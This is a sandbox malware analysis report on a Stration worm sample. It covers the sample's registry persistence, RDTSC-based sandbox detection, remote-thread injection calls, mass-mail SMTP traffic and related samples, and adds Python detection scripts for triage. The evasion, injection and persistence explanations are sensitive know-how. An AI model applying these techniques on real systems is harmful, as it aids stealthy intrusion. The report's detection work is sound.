Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_0042647C push eax; ret at 0_2_0042649A
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_004254B0 push eax; ret at 0_2_004254C4
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_004254B0 push eax; ret at 0_2_004254EC
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_00426687 push ecx; ret at 0_2_00426697
The push/ret pairs are indirect transfers through the stack (a jump to the pushed register value), which hide the control-flow target from static disassembly.

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\document.log.scr.exe | Executable created and started: C:\Windows\tserv.exe
Source: C:\Users\user\Desktop\document.log.scr.exe | File created: C:\Windows\tserv.exe (dropped file; the report lists this entry twice)
Writing into C:\Windows requires an elevated token, which is consistent with the administrative-privilege check and the AdjustTokenPrivileges routine recorded elsewhere in this report.

Boot Survival

Source: C:\Windows\tserv.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLs
Source: C:\Windows\tserv.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run tserv (the autostart timeline gives the data as C:\Windows\tserv.exe s; the entry is listed twice, once per tserv.exe instance)
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_0041D159 GetProcAddress x5, LoadLibraryA, GetProcAddress x5, LoadLibraryA, GetProcAddress x2, LoadLibraryA, GetProcAddress x2 (runtime import resolution across three libraries)

Two autostart mechanisms are set here. The Run value restarts tserv.exe with the "s" argument at logon. AppInit_DLLs under Windows NT\CurrentVersion\Windows is the user32-triggered DLL load: when LoadAppInit_DLLs is enabled, every process that loads user32.dll also loads the listed DLLs. The write is in the WOW6432Node view, so only 32-bit processes would be affected, and on Windows 8 and later with Secure Boot enabled the mechanism is disabled by default; the report records the write but not the value data, so what DLL (if any) was registered is unknown.
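The drop-and-autostart chain above (PE written under C:\Windows by the sample, started by the same parent, then referenced from a Run value, plus an AppInit_DLLs write and a double-extension lure name) is the kind of pattern a triage script should pull out of a sandbox run automatically. The following is an added example, not Joe Sandbox code: the event records are transcribed by hand from this report's entries into a small constructed format (the AppInit_DLLs value data is left empty because the report does not give it), and the finding names, the Event class and the extension lists are this example's own choices.

```python
"""Triage of a dropper / persistence chain from sandbox-style behaviour events.

Added example for this report; not Joe Sandbox code. The events below were
transcribed by hand from the report's own entries and are a constructed
input, not the report's raw format.
"""
import ntpath
from dataclasses import dataclass

# Extensions that execute on double-click, and the document-looking
# extensions a lure name puts in front of them (document.log.scr.exe).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd"}
DOCUMENT_EXTS = {"log", "txt", "doc", "docx", "pdf", "jpg", "png", "xls", "elm", "msg"}
WINDOWS_DIR = "c:\\windows\\"


@dataclass(frozen=True)
class Event:
    process: str    # image path of the acting process
    action: str     # "file_created" | "process_created" | "reg_value_set"
    target: str     # file path, command line, or registry value path
    data: str = ""  # registry value data, where the report gives it


SAMPLE_PATH = r"C:\Users\user\Desktop\document.log.scr.exe"
TSERV = r"C:\Windows\tserv.exe"

# Constructed from the Persistence / Boot Survival entries and the autostart
# timeline of the report; AppInit_DLLs data is not in the report, so it is empty.
SAMPLE_EVENTS = [
    Event(SAMPLE_PATH, "file_created", TSERV),
    Event(SAMPLE_PATH, "process_created", TSERV + " s"),
    Event(SAMPLE_PATH, "process_created",
          r"C:\Windows\System32\notepad.exe C:\Users\user\Desktop\2BF7.tmp"),
    Event(TSERV, "reg_value_set",
          r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs"),
    Event(TSERV, "reg_value_set",
          r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tserv", TSERV + " s"),
    Event("unknown", "process_created", '"' + TSERV + '" s'),  # second instance, parent unknown
]


def first_image(cmdline: str) -> str:
    """Image path from a command line, honouring a quoted first argument."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def is_lure_name(path: str) -> bool:
    """True for names like document.log.scr.exe: a document-looking extension
    sitting in front of an executable one."""
    parts = ntpath.basename(path).lower().split(".")
    if len(parts) < 3 or parts[-1] not in EXECUTABLE_EXTS:
        return False
    return any(p in DOCUMENT_EXTS for p in parts[1:-1])


def dropped_and_executed(events):
    """(parent, image) pairs where a process wrote a PE under C:\\Windows and
    later started it: 'drops executables to the windows directory and starts them'."""
    written, hits = set(), set()
    for ev in events:
        target = ev.target.lower()
        if ev.action == "file_created" and target.startswith(WINDOWS_DIR) \
                and target.endswith((".exe", ".dll", ".scr")):
            written.add((ev.process.lower(), target))
        elif ev.action == "process_created":
            image = first_image(ev.target)
            if (ev.process.lower(), image.lower()) in written:
                hits.add((ev.process, image))
    return hits


def persistence_findings(events, dropped_images):
    """Autostart writes, tying Run entries back to the dropped files."""
    dropped = {p.lower() for p in dropped_images}
    findings = set()
    for ev in events:
        if ev.action != "reg_value_set":
            continue
        key = ev.target.lower()
        if key.endswith("\\windows\\appinit_dlls"):
            findings.add("appinit_dlls_modified")
        elif "\\currentversion\\run\\" in key:
            findings.add("run_key_created")
            if ev.data and first_image(ev.data).lower() in dropped:
                findings.add("run_key_points_to_dropped_file")
    return findings


def triage(events, sample_path):
    """Sorted list of finding names for one sandbox run."""
    findings = set()
    if is_lure_name(sample_path):
        findings.add("double_extension_lure")
    dropped = dropped_and_executed(events)
    if dropped:
        findings.add("drops_pe_to_windows_dir_and_starts_it")
    findings |= persistence_findings(events, [img for _, img in dropped])
    return sorted(findings)


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS, SAMPLE_PATH):
        print(finding)
```

Matching is done on lower-cased paths because Windows paths are case-insensitive, and the Run-value check compares the first image of the value data rather than the whole string so that the trailing "s" argument does not defeat it. The AppInit_DLLs check only reports the write; whether it is effective on the victim depends on LoadAppInit_DLLs and Secure Boot, which a sandbox event list cannot tell you.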

Malware Analysis System Evasion

Source: document.log.scr.exe | Static PE information: Resource name: RT_ICON size: 0xffffff28
A resource size of 0xFFFFFF28 is larger than any plausible file (read as unsigned) or negative (read as signed); the resource data entry is malformed. A parser that trusts the Size field will read past the end of the file or give up, so clamp resource reads to the containing section and treat an entry like this as a tamper indicator rather than an icon.

Source: C:\Users\user\Desktop\document.log.scr.exe | RDTSC instruction interceptor: three consecutive traces, first address 40C1E0 to second address 40C1EE, 40C1EE to 40C1FC, and 40C1FC to 40C20A. All three record the same instruction sequence; only the stack slot and the conditional-branch target differ, so one listing is given:

    0x00 rdtsc
    0x02 xor eax, edx
    0x04 xor dword ptr [esp+04h], eax      ; traces 2 and 3: [esp+08h], [esp+0Ch]
    0x08 call esi                          ; thunk below
    0x0a push ecx
    0x0b call dword ptr [74E5188Ch]        ; imported routine, body follows
    0x11 mov edi, edi
    0x13 push ebp
    0x14 mov ebp, esp
    0x16 push ecx
    0x17 mov ecx, dword ptr [7FFE0004h]    ; KUSER_SHARED_DATA.TickCountMultiplier
    0x1d mov dword ptr [ebp-04h], ecx
    0x20 cmp ecx, 01000000h
    0x26 jc 00007F22E4F2F8D5h              ; trace 2: 00007F22E4D0F815h
    0x2c mov eax, 7FFE0320h                ; KUSER_SHARED_DATA.TickCount
    0x31 mov eax, dword ptr [eax]
    0x33 mul ecx
    0x35 shrd eax, edx, 00000018h          ; (TickCount * Multiplier) >> 24
    0x39 mov esp, ebp
    0x3b pop ebp
    0x3c ret
    0x3d pop ecx
    0x3e ret
    0x3f mov dword ptr [esp+08h], eax      ; traces 2 and 3: [esp+0Ch], [esp+10h]
    0x43 rdtsc

The sample's own code is only the rdtsc / xor / call esi / mov [esp+..], eax sequence (14 bytes, which is exactly the distance between the recorded addresses). esi points at a thunk (push ecx; call [import]; pop ecx; ret), and the imported routine reads TickCountMultiplier and TickCount from KUSER_SHARED_DATA and combines them with mul and shrd 24, which is the user-mode implementation of GetTickCount. The sample is therefore timing how many cycles a GetTickCount call costs, three times in a row, and keeping both the rdtsc deltas and the tick values on the stack; a hypervisor or an API hook that makes the call unusually slow is what this detects.

Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_0040C1D0 rdtsc
Source: C:\Windows\tserv.exe | Thread delayed: delay time: 300000 (two entries, one per instance)
Source: C:\Users\user\Desktop\document.log.scr.exe | Evasive API call chain: GetModuleFileName, DecisionNodes, ExitProcess (graph_0-12752; the sample inspects its own module path and may exit depending on it)
Source: C:\Users\user\Desktop\document.log.scr.exe | Check user administrative privileges: GetTokenInformation, DecisionNodes (graph_0-12686)
Source: C:\Windows\tserv.exe TID: 3192 | Thread sleep time: -300000s >= -30000s
Source: C:\Windows\tserv.exe TID: 5600 | Thread sleep time: -300000s >= -30000s
Source: C:\Windows\tserv.exe | Last function: Thread delayed (two entries, one per instance)
The 300000 ms delays are five-minute sleeps, which is the "long sleeps (>= 3 min)" signature. The run was a 5m 35s timeout, and the analysis timeline records 23 Sleep calls in tserv.exe being modified by the sandbox, so the delays were shortened; behaviour gated behind the unmodified sleep on a real host may still be missing from this report.
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_00406360 GetFileAttributesA, lstrcpyA, lstrcatA, lstrcatA, FindFirstFileA, GetLastError, lstrcmpA, lstrcmpA, lstrcmpA, lstrcpyA, lstrcatA, lstrcatA, lstrcpyA, lstrcatA, FindNextFileA, FindClose (directory walk with name comparisons)
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_00429F44 VirtualQuery, GetSystemInfo, VirtualQuery, VirtualAlloc, VirtualProtect (the requested page protection is not shown)
Source: C:\Windows\tserv.exe | Thread delayed: delay time: 300000 (two further entries)
Source: C:\Users\user\Desktop\document.log.scr.exe | API call chain: ExitProcess graph end node (graph_0-12753)
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_0040C1D0 rdtsc (listed again under the execution-timing signature)
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_0041F660 LoadLibraryA, GetProcAddress, SetWindowsHookExA
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_004210D0 GetProcessHeap, GetProcessHeap, HeapAlloc, RegOpenKeyExA, GetLastError, GetProcessHeap, HeapFree, RegCloseKey
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_0042731A SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_0042732E SetUnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_00404840 OpenProcess, lstrlenA, VirtualAllocEx, WriteProcessMemory, GetModuleHandleA, GetProcAddress, CreateRemoteThread
This is the textbook remote-thread injection sequence: open a target, allocate in it, write a buffer whose length is taken with lstrlenA (so a string, typically a DLL path), resolve an export with GetModuleHandleA/GetProcAddress and start it as the remote thread's entry point. The report does not identify the target process, the module or the export, so do not assume a specific DLL; the detection to write is on the OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread chain itself.
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_00423260 GetProcessHeap, HeapAlloc, HeapAlloc, HeapAlloc, HeapFree, HeapAlloc, HeapFree, HeapFree, HeapFree, HeapAlloc, HeapFree, HeapFree, HeapFree, HeapAlloc, HeapFree, HeapFree, HeapFree, HeapFree, HeapAlloc, HeapFree, HeapFree, HeapFree, HeapFree, HeapFree, InitializeSecurityDescriptor, GetCurrentProcess, OpenProcessToken, GetTokenInformation, GetTokenInformation, GetTokenInformation, GetTokenInformation, SetSecurityDescriptorOwner, SetSecurityDescriptorGroup, AllocateAndInitializeSid, GetLengthSid, AddAce, AllocateAndInitializeSid, GetLengthSid, AddAce, AllocateAndInitializeSid, GetLengthSid, AddAce, IsValidSecurityDescriptor (builds a security descriptor with owner and group taken from its own token and a three-entry DACL; the object it is applied to is not shown)

The remaining entries of this section are locale, time and OS-version queries:
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: GetLocaleInfoA at 0_2_0042C8B2
Source: C:\Windows\SysWOW64\notepad.exe | Queries volume information: C:\Users\user\Desktop\2BF7.tmp VolumeInformation
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_00401830 ExpandEnvironmentStringsA, GetLocalTime, CreateFileA, CloseHandle
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_0040BE00 lstrlenA, GetLocalTime, GetTimeZoneInformation, lstrlenA
Source: C:\Users\user\Desktop\document.log.scr.exe | Code function: 0_2_00425D91 EntryPoint, GetVersionExA, GetModuleHandleA, GetModuleHandleA, _fast_error_exit, _fast_error_exit, GetCommandLineA, GetStartupInfoA, __wincmdln, GetModuleHandleA (the MSVC C runtime start-up routine, not sample-specific logic)
MITRE ATT&CK matrix. The report's matrix is flattened here to the techniques it matched, listed per tactic; the digits the report prints in front of a technique are its signature counts and are kept as printed. The unmatched template cells of the original matrix (Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration and Impact carried no matches) are omitted.

Execution: 3 Native API
Persistence: 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading
Privilege Escalation: 1 Access Token Manipulation; 11 Process Injection; 11 Registry Run Keys / Startup Folder; 1 DLL Side-Loading
Defense Evasion: 121 Masquerading; 121 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading
Discovery: 2 System Time Discovery; 32 Security Software Discovery; 121 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 File and Directory Discovery; 124 System Information Discovery
Collection: 1 Archive Collected Data
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol
Behavior graph (ID 1546160, sample document.log.scr.exe, start date 31/10/2024, architecture WINDOWS, score 100), flattened from the graphical view. The numbers after a process name are the graph's created-file and created-registry-value counters.

Root signatures: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Detected PE file pumping (to bypass AV & sandboxing); 3 other signatures
Root network nodes: yahoo.com; www4.cedesunjerinkas.com; 9 other IPs or domains

document.log.scr.exe (3), started from the root
    dropped: C:\Windows\tserv.exe (PE32); C:\Windows\tserv.exe:Zone.Identifier (ASCII, i.e. Mark-of-the-Web was carried over to the dropped copy)
    signatures: Contains functionality to inject threads in other processes; Drops executables to the windows directory (C:\Windows) and starts them; Tries to detect virtualization through RDTSC time measurements
    started: tserv.exe (1 12); notepad.exe
        tserv.exe (child) contacted: mta6.am0.yahoodns.net 98.136.96.75 port 25 (YAHOO-NE1US, United States); mta7.am0.yahoodns.net 98.136.96.77 port 25 (YAHOO-NE1US, United States); 5 other IPs or domains
        tserv.exe (child) signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Creates an undocumented autostart registry key; Machine Learning detection for dropped file
tserv.exe (12), started from the root (second instance)
    contacted: 67.195.204.77 port 25 (YAHOO-3US, United States)

Antivirus results (Source | Detection | Scanner | Label)

Submitted sample
document.log.scr.exe | 95% | ReversingLabs | Win32.Worm.Stration
document.log.scr.exe | 100% | Avira | WORM/Stration.C
document.log.scr.exe | 100% | Joe Sandbox ML | (no label)

Dropped file
C:\Windows\tserv.exe | 100% | Avira | WORM/Stration.C
C:\Windows\tserv.exe | 100% | Joe Sandbox ML | (no label)
C:\Windows\tserv.exe | 95% | ReversingLabs | Win32.Worm.Stration

No antivirus matches in the report's three remaining antivirus tables.
Contacted domains (Name | IP | Active | Malicious | Antivirus detection | Reputation)

mta6.am0.yahoodns.net           | 98.136.96.75    | true    | false | - | unknown
alt4.gmail-smtp-in.l.google.com | 74.125.200.27   | true    | false | - | unknown
alt3.gmail-smtp-in.l.google.com | 142.251.1.26    | true    | false | - | unknown
mta7.am0.yahoodns.net           | 98.136.96.77    | true    | false | - | unknown
gmail-smtp-in.l.google.com      | 74.125.206.27   | true    | false | - | unknown
mta5.am0.yahoodns.net           | 67.195.228.94   | true    | false | - | unknown
www4.cedesunjerinkas.com        | 193.166.255.171 | true    | false | - | unknown
alt2.gmail-smtp-in.l.google.com | 142.251.9.27    | true    | false | - | unknown
alt1.gmail-smtp-in.l.google.com | 142.250.153.26  | true    | false | - | unknown
gmail.com                       | unknown         | unknown | false | - | unknown
yahoo.com                       | unknown         | unknown | false | - | unknown

The *.gmail-smtp-in.l.google.com and mta*.am0.yahoodns.net names are the public MX hosts of gmail.com and yahoo.com: the sample looked up the providers' mail exchangers and, per the behaviour graph, connected to them on port 25 directly, which is mass-mailer behaviour rather than ordinary client mail. None of these hosts is malicious in itself; the indicator is an endpoint process speaking SMTP to them.
Contacted IPs (IP | Domain | Country | ASN | ASN name | Malicious)

98.136.96.77    | mta7.am0.yahoodns.net           | United States | 36646 | YAHOO-NE1US | false
67.195.228.94   | mta5.am0.yahoodns.net           | United States | 36647 | YAHOO-GQ1US | false
193.166.255.171 | www4.cedesunjerinkas.com        | Finland       | 1741  | FUNETASFI   | false
142.250.153.26  | alt1.gmail-smtp-in.l.google.com | United States | 15169 | GOOGLEUS    | false
142.251.9.27    | alt2.gmail-smtp-in.l.google.com | United States | 15169 | GOOGLEUS    | false
142.251.1.26    | alt3.gmail-smtp-in.l.google.com | United States | 15169 | GOOGLEUS    | false
67.195.204.77   | unknown                         | United States | 26101 | YAHOO-3US   | false
98.136.96.75    | mta6.am0.yahoodns.net           | United States | 36646 | YAHOO-NE1US | false
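The network picture above is a workstation process resolving the MX hosts of two public mail providers and opening port 25 to them. The following is an added example, not Joe Sandbox code, of the check a detection engineer would run over DNS answers and connection records to flag that pattern and, more generally, any process that talks SMTP straight to several providers' mail exchangers. The MX grouping is inferred from the host names (the report lists resolved hosts, not the MX queries), port 25 is only confirmed by the behaviour graph for the three Yahoo peers and is assumed for the Google hosts, port 80 for www4.cedesunjerinkas.com is an assumption, and the svchost.exe row is a constructed benign control.

```python
"""Direct-to-MX SMTP detection from DNS answers and connection records.

Added example for this report, not Joe Sandbox code. The DNS answers and
connections below are transcribed from the report's DNS/IP tables and
behaviour graph and are a constructed input, not captured traffic.
"""
from collections import defaultdict

# MX hosts seen in the report, grouped by the mail domain they serve.
# Assumption: the grouping is inferred from the host names; the report lists
# the resolved hosts, not the MX queries that produced them.
MX_HOSTS = {
    "yahoo.com": {"mta5.am0.yahoodns.net", "mta6.am0.yahoodns.net", "mta7.am0.yahoodns.net"},
    "gmail.com": {"gmail-smtp-in.l.google.com", "alt1.gmail-smtp-in.l.google.com",
                  "alt2.gmail-smtp-in.l.google.com", "alt3.gmail-smtp-in.l.google.com",
                  "alt4.gmail-smtp-in.l.google.com"},
}

# A records from the report's IP table (67.195.204.77 was not resolved there).
A_RECORDS = {
    "98.136.96.75": "mta6.am0.yahoodns.net",
    "98.136.96.77": "mta7.am0.yahoodns.net",
    "67.195.228.94": "mta5.am0.yahoodns.net",
    "74.125.206.27": "gmail-smtp-in.l.google.com",
    "142.250.153.26": "alt1.gmail-smtp-in.l.google.com",
    "142.251.9.27": "alt2.gmail-smtp-in.l.google.com",
    "142.251.1.26": "alt3.gmail-smtp-in.l.google.com",
    "74.125.200.27": "alt4.gmail-smtp-in.l.google.com",
    "193.166.255.171": "www4.cedesunjerinkas.com",
}

TSERV = r"C:\Windows\tserv.exe"

# (process, destination ip, destination port). The behaviour graph shows port
# 25 for the three Yahoo peers; port 25 for the Google MX hosts and port 80 for
# www4.cedesunjerinkas.com are assumptions. The svchost row is a constructed
# benign control on a documentation address.
CONNECTIONS = [
    (TSERV, "67.195.204.77", 25),
    (TSERV, "98.136.96.75", 25),
    (TSERV, "98.136.96.77", 25),
    (TSERV, "67.195.228.94", 25),
    (TSERV, "74.125.206.27", 25),
    (TSERV, "142.250.153.26", 25),
    (TSERV, "193.166.255.171", 80),
    (r"C:\Windows\System32\svchost.exe", "203.0.113.5", 443),
]


def direct_to_mx(connections, a_records, mx_hosts, min_domains=2):
    """Processes that speak SMTP straight to the MX hosts of at least
    `min_domains` mail providers, i.e. a mass-mailer rather than a client
    relaying through its own mail server. Per flagged process: sorted mail
    domains, MX hosts, and port-25 peers with no DNS name."""
    host_to_domain = {h: d for d, hosts in mx_hosts.items() for h in hosts}
    per_proc = defaultdict(lambda: {"mail_domains": set(), "mx_hosts": set(),
                                    "unresolved_smtp_peers": set()})
    for proc, ip, port in connections:
        if port != 25:
            continue
        host = a_records.get(ip)
        if host is None:
            per_proc[proc]["unresolved_smtp_peers"].add(ip)
            continue
        domain = host_to_domain.get(host)
        if domain is not None:
            per_proc[proc]["mail_domains"].add(domain)
            per_proc[proc]["mx_hosts"].add(host)
    return {proc: {k: sorted(v) for k, v in stats.items()}
            for proc, stats in per_proc.items()
            if len(stats["mail_domains"]) >= min_domains}


def smtp_from_endpoint(connections):
    """Every process that opened tcp/25 at all, for environments where
    workstations must never speak SMTP directly."""
    return sorted({proc for proc, _, port in connections if port == 25})


if __name__ == "__main__":
    for proc, stats in direct_to_mx(CONNECTIONS, A_RECORDS, MX_HOSTS).items():
        print(proc, stats)
```

The unresolved port-25 peer is reported separately on purpose: a mass-mailer that caches MX results or hard-codes them produces SMTP connections with no matching DNS answer in the capture window, and those should not silently drop out of the count. On a managed network the simpler `smtp_from_endpoint` rule (no workstation talks tcp/25 to anything but the corporate relay) is usually the one worth alerting on; the MX correlation is for attributing the traffic to mail-provider abuse rather than to a misconfigured client.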
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1546160
                        Start date and time:2024-10-31 15:25:17 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 5m 35s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:document.log.scr.exe
                        Detection:MAL
                        Classification:mal100.evad.winEXE@6/3@12/8
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 96%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 124
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes were analyzed, report is missing behavior information
                        • VT rate limit hit for: document.log.scr.exe
                        Time | Type | Description
                        10:26:28API Interceptor23x Sleep call for process: tserv.exe modified
                        14:26:27AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run tserv C:\Windows\tserv.exe s
Other samples that contacted the same IPs (Match: associated sample name, detection, threat name, context). The SHA-256 and link columns of the report are not present in this page.

98.136.96.77: Crt09EgZK3.exe (malicious, Tofsee); file.exe (malicious, Phorpiex); file.exe (malicious, Phorpiex); file.exe (malicious, Tofsee); 3pYA64ZwEC.exe (malicious, Unknown); gEkl9O5tiu.exe (malicious, Phorpiex); l3Qj8QhTYZ.exe (malicious, Phorpiex); file.log.exe (malicious, Unknown); message.elm.exe (malicious, Unknown); message.txt.exe (malicious, Unknown)
67.195.228.94: fdnoqmpv.exe (malicious, Tofsee); AvDJi40xp_9fyz7RPmKdbxb4.exe (malicious, Tofsee); dIg0MWRViP.exe (malicious, Tofsee); SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe (malicious, Phorpiex); file.exe (malicious, Phorpiex); WtRLqa6ZXn.exe (malicious, Unknown); newtpp.exe (malicious, Phorpiex); gEkl9O5tiu.exe (malicious, Phorpiex); file.exe (malicious, Tofsee); file.exe (malicious, Phorpiex, Xmrig)
193.166.255.171: yGktPvplJn.exe (malicious, Pushdo; context www.synetik.net/); cnzWgjUhS2.exe (malicious, Neconyd; lousta.net/161/343.html); Z0rY97IU6r.exe (malicious, Neconyd; lousta.net/372/625.html); 2VJZxIY76V.exe (malicious, Neconyd; lousta.net/766/881.html); qIIGdGOTWO.exe (malicious, Neconyd; lousta.net/240/311.html); O0prB0zCWi.exe (malicious, Neconyd; lousta.net/461/572.html); djvu452.exe (malicious, Neconyd; lousta.net/775/668.html); v48ge.exe (malicious, Neconyd; lousta.net/803/179.html); moviename.exe (malicious, Neconyd; lousta.net/559/617.html); voltage.exe (malicious, Neconyd; lousta.net/4/805.html)

Other samples that contacted the same domains (Match: associated sample name, detection, threat name, IP the domain resolved to for that sample).

mta6.am0.yahoodns.net: Crt09EgZK3.exe (malicious, Tofsee; 98.136.96.77); 2IFYYPRUgO.exe (malicious, Tofsee; 67.195.228.111); qkkcfptf.exe (malicious, Tofsee; 98.136.96.74); vekvtia.exe (malicious, Tofsee; 67.195.204.79); knkduwqg.exe (malicious, Tofsee; 98.136.96.75); foufdsk.exe (malicious, Tofsee; 98.136.96.76); UUJycuNA6D.exe (malicious, Tofsee; 67.195.204.77); SGn3RtDC8Y.exe (malicious, Tofsee; 67.195.228.106); .exe (malicious, Unknown; 98.136.96.76); Sm4Ty3Em4z.exe (malicious, Tofsee; 67.195.204.73)
alt4.gmail-smtp-in.l.google.com: 4ui8luUSNp.exe (malicious, Coinhive, Xmrig; 74.125.200.26); rLJ135TPN7.exe (malicious, Unknown; 142.250.153.27); gEkl9O5tiu.exe (malicious, Phorpiex; 173.194.202.27); file.msg.scr.exe (malicious, Unknown; 142.250.157.27); Fb4J788TwD.exe (malicious, MiMail; 173.194.202.26); ydbWyoxHsd.exe (malicious, Unknown; 142.250.157.26); Readme.exe (malicious, Unknown; 74.125.200.26); file.log.exe (malicious, Unknown; 173.194.202.26); data.log.exe (malicious, Unknown; 173.194.202.27); message.elm.exe (malicious, Unknown; 173.194.202.27)
mta7.am0.yahoodns.net: OPgjjiInNK.exe (malicious, Tofsee; 98.136.96.76); 2FnvReiPU6.exe (malicious, Tofsee; 98.136.96.91); 874A7cigvX.exe (malicious, Tofsee; 67.195.204.74); RSno9EH0K9.exe (malicious, Tofsee; 67.195.228.111); Uc84uB877e.exe (malicious, Tofsee; 67.195.228.109); bEsOrli29K.exe (malicious, Tofsee; 67.195.204.77); Eduhazqw4u.exe (malicious, Tofsee; 67.195.228.109); setup.exe (malicious, Tofsee)

Read these overlaps for what they are. The Yahoo and Google entries are public mail exchangers, so the Tofsee, Phorpiex and MiMail samples listed against them share nothing with this sample except that they, too, spam through the same providers' MX hosts; the matches attribute behaviour (mass mailing), not infrastructure. The 193.166.255.171 overlap with Pushdo and Neconyd samples is of a different kind, since www4.cedesunjerinkas.com is not a mail provider, but the report gives no detail on what this sample exchanged with it beyond the HTTP-without-user-agent signature, so it is a lead to pivot on, not a confirmed shared C2. Sample names such as file.msg.scr.exe, file.log.exe and message.elm.exe follow the same document-extension lure pattern as document.log.scr.exe.
                                                                • 98.136.96.76
                                                                m4Jp2TLBHJ.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.204.77
                                                                SecuriteInfo.com.Trojan-Ransom.StopCrypt.22110.437.exeGet hashmaliciousTofseeBrowse
                                                                • 67.195.204.74
                                                                gmail-smtp-in.l.google.comyGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                • 142.251.168.27
                                                                4ui8luUSNp.exeGet hashmaliciousCoinhive, XmrigBrowse
                                                                • 74.125.200.26
                                                                .exeGet hashmaliciousUnknownBrowse
                                                                • 142.251.173.26
                                                                a5hbkmGD7N.exeGet hashmaliciousPushdoBrowse
                                                                • 173.194.219.26
                                                                sorteado!!.com.exeGet hashmaliciousUnknownBrowse
                                                                • 74.125.138.26
                                                                file.exeGet hashmaliciousPhorpiexBrowse
                                                                • 142.250.113.27
                                                                webcam.txt.com.exeGet hashmaliciousUnknownBrowse
                                                                • 172.253.115.27
                                                                G7DyaA9iz9.exeGet hashmaliciousPushdoBrowse
                                                                • 142.251.111.27
                                                                EwK95WVtzI.exeGet hashmaliciousPushdoBrowse
                                                                • 74.125.137.27
                                                                OWd39WUX3D.exeGet hashmaliciousPushdoBrowse
                                                                • 172.253.63.27
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                FUNETASFIj3Lr4Fk7Kb.elfGet hashmaliciousMiraiBrowse
                                                                • 86.50.36.169
                                                                nabarm.elfGet hashmaliciousUnknownBrowse
                                                                • 130.232.111.233
                                                                splarm.elfGet hashmaliciousUnknownBrowse
                                                                • 192.98.38.193
                                                                mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 157.24.20.223
                                                                nklarm5.elfGet hashmaliciousUnknownBrowse
                                                                • 193.166.100.123
                                                                jklppc.elfGet hashmaliciousUnknownBrowse
                                                                • 128.214.222.213
                                                                la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                • 130.232.65.208
                                                                la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                • 161.41.22.255
                                                                yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                • 193.166.255.171
                                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                • 161.41.157.202
                                                                YAHOO-NE1USla.bot.sparc.elfGet hashmaliciousUnknownBrowse
